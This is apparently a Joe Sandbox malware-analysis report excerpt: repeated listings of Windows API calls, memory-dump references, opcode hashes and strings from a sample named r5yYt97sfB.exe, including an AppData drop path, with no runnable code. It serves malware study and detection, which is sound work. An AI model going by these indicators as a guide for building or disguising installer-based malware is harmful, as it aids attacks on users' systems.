                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                                                              • Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
                                                                                                                                              • Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                                                              • Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                                                              • Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
                                                                                                                                              • Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                                                              • Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C76
                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C81
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404CDE
                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404D54
                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404EAE
                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040507E
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040508E
                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040522D
                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405238
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040523F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                              • String ID: $M$N
                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                              • Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                                                              • Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
                                                                                                                                              • Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                                                              • Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404731
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040475B
                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040480C
                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404817
                                                                                                                                              • lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
                                                                                                                                              • lstrcatW.KERNEL32(?,: Completed), ref: 00404855
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867
                                                                                                                                                • Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF
                                                                                                                                                • Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                                                                • Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                                                                • Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                                                                • Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945
                                                                                                                                                • Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                                                                • Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
                                                                                                                                                • Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
                                                                                                                                              • API String ID: 2624150263-3880493371
                                                                                                                                              • Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                                                              • Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
                                                                                                                                              • Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                                                              • Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69
                                                                                                                                              APIs
                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404496
                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
                                                                                                                                              • GetSysColor.USER32(?), ref: 004044C4
                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004044E5
                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404560
                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404567
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404592
                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004045E6
                                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404607
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040460A
                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                              • String ID: : Completed$N$[C@$open
                                                                                                                                              • API String ID: 3615053054-3308546834
                                                                                                                                              • Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                                                              • Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
                                                                                                                                              • Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                                                              • Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9
                                                                                                                                              APIs
                                                                                                                                              • lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE
                                                                                                                                                • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                                                                • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                                                              • GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
                                                                                                                                              • wsprintfA.USER32 ref: 00405F29
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
                                                                                                                                              • SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406012
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406019
                                                                                                                                                • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405D5C
                                                                                                                                                • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                              • String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
                                                                                                                                              • API String ID: 222337774-3510403337
                                                                                                                                              • Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                                                              • Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
                                                                                                                                              • Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                                                              • Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD
                                                                                                                                              APIs
                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                              • String ID: F
                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                              • Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                                                              • Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
                                                                                                                                              • Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                                                              • Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4
                                                                                                                                              APIs
                                                                                                                                              • CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                                                              • CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                                                              • CharNextW.USER32(0040A230,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                                                              • CharPrevW.USER32(0040A230,0040A230,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                                                              Strings
                                                                                                                                              • "C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 0040645B
                                                                                                                                              • *?|<>/":, xrefs: 00406469
                                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406418
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
